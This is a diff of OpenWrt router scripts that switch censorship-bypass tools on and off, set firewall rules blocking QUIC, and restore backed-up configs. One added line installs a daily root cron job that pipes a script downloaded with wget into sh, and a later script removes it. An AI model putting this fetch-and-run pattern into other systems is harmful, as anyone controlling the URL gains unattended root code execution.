+  uci set firewall.@rule[-1].dest='wan'
+  uci set firewall.@rule[-1].dest_port='80'
+  uci set firewall.@rule[-1].target='REJECT'
+  uci add firewall rule # =cfg2592bd
+  uci set firewall.@rule[-1].name='Block_UDP_443'
+  uci add_list firewall.@rule[-1].proto='udp'
+  uci set firewall.@rule[-1].src='lan'
+  uci set firewall.@rule[-1].dest='wan'
+  uci set firewall.@rule[-1].dest_port='443'
+  uci set firewall.@rule[-1].target='REJECT'
+  uci commit firewall
+  service firewall restart
+fi
+
+cronTask="0 4 * * * wget -O - $URL/configure_zaprets.sh | sh"
+str=$(grep -i "0 4 \* \* \* wget -O - $URL/configure_zaprets.sh | sh" /etc/crontabs/root)
+if [ -z "$str" ] 
+then
+  echo "Add cron task auto run configure_zapret..."
  echo "$cronTask" >> /etc/crontabs/root
 fi

+manage_package "podkop" "disable" "stop"
+manage_package "ruantiblock" "disable" "stop"
+manage_package "https-dns-proxy" "enable" "start"
+manage_package "youtubeUnblock" "enable" "start"
+
 echo "Restart service..."

 service youtubeUnblock restart
@@ -83,4 +308,4 @@ service https-dns-proxy restart
 service dnsmasq restart
 service odhcpd restart

-echo "Configure complete..."
+printf  "\033[32;1mConfigured completed...\033[0m\n"
--- a/off_awg_config.sh
+++ b/off_awg_config.sh
@@ -0,0 +1,62 @@
+#!/bin/sh
+
+DIR="/etc/config"
+DIR_BACKUP="/root/backup2"
+config_files="network
+firewall"
+
+manage_package() {
+    local name="$1"
+    local autostart="$2"
+    local process="$3"
+
+    # Проверка, установлен ли пакет
+    if opkg list-installed | grep -q "^$name"; then
+        
+        # Проверка, включен ли автозапуск
+        if /etc/init.d/$name enabled; then
+            if [ "$autostart" = "disable" ]; then
+                /etc/init.d/$name disable
+            fi
+        else
+            if [ "$autostart" = "enable" ]; then
+                /etc/init.d/$name enable
+            fi
+        fi
+
+        # Проверка, запущен ли процесс
+        if pidof $name > /dev/null; then
+            if [ "$process" = "stop" ]; then
+                /etc/init.d/$name stop
+            fi
+        else
+            if [ "$process" = "start" ]; then
+                /etc/init.d/$name start
+            fi
+        fi
+    fi
+}
+
+if [ -d "$DIR_BACKUP" ]
+then
+    echo "Restore configs..."
+    for file in $config_files
+    do
+        cp -f "$DIR_BACKUP/$file" "$DIR/$file"   
+    done
+
+    rm -rf "$DIR_BACKUP"
+fi
+
+echo "Stop and disabled autostart Podkop..."
+manage_package "podkop" "disable" "stop"
+
+echo "Run and enabled autostart youtubeUnblock and ruantiblock..."
+manage_package "youtubeUnblock" "enable" "start"
+manage_package "ruantiblock" "enable" "start"
+
+printf  "\033[32;1mRestart firewall...\033[0m\n"
+service firewall restart
+#service network restart
+
+printf  "\033[32;1mOff configured completed...\033[0m\n"
--- a/off_configure_zaprets.sh
+++ b/off_configure_zaprets.sh
@@ -1,17 +1,22 @@
 #!/bin/sh

+URL="https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main"
 DIR="/etc/config"
 DIR_BACKUP="/root/backup"
 config_files="dhcp
 youtubeUnblock
 https-dns-proxy"

-echo "Restore configs..."
+if [ -d "$DIR_BACKUP" ]
+then
+  echo "Restore configs..."
+  for file in $config_files
+  do
+    cp -f "$DIR_BACKUP/$file" "$DIR/$file"   
+  done

-for file in $config_files
-do
-  cp -f "$DIR_BACKUP/$file" "$DIR/$file"   
-done
+  rm -rf "$DIR_BACKUP"
+fi

 echo "Restart service..."

@@ -20,4 +25,14 @@ service https-dns-proxy restart
 service dnsmasq restart
 service odhcpd restart

-echo "Off configure complete..."
+echo "Remove cron task auto run script configure zaprets.."
+
+str=$(grep -i "0 4 \* \* \* wget -O - $URL/configure_zaprets.sh | sh" /etc/crontabs/root)
+if [ ! -z "$str" ]
+then
+	grep -v "0 4 \* \* \* wget -O - $URL/configure_zaprets.sh | sh" /etc/crontabs/root > /etc/crontabs/temp
+	cp -f "/etc/crontabs/temp" "/etc/crontabs/root"
+	rm -f "/etc/crontabs/temp"
+fi
+
+printf  "\033[32;1mOff configured completed...\033[0m\n"
--- a/podkop_packets/luci-app-podkop_0.2.5_all.ipk
+++ b/podkop_packets/luci-app-podkop_0.2.5_all.ipk
--- a/podkop_packets/luci-i18n-podkop-ru_0.2.5.ipk
+++ b/podkop_packets/luci-i18n-podkop-ru_0.2.5.ipk
--- a/podkop_packets/podkop_0.2.5-1_all.ipk
+++ b/podkop_packets/podkop_0.2.5-1_all.ipk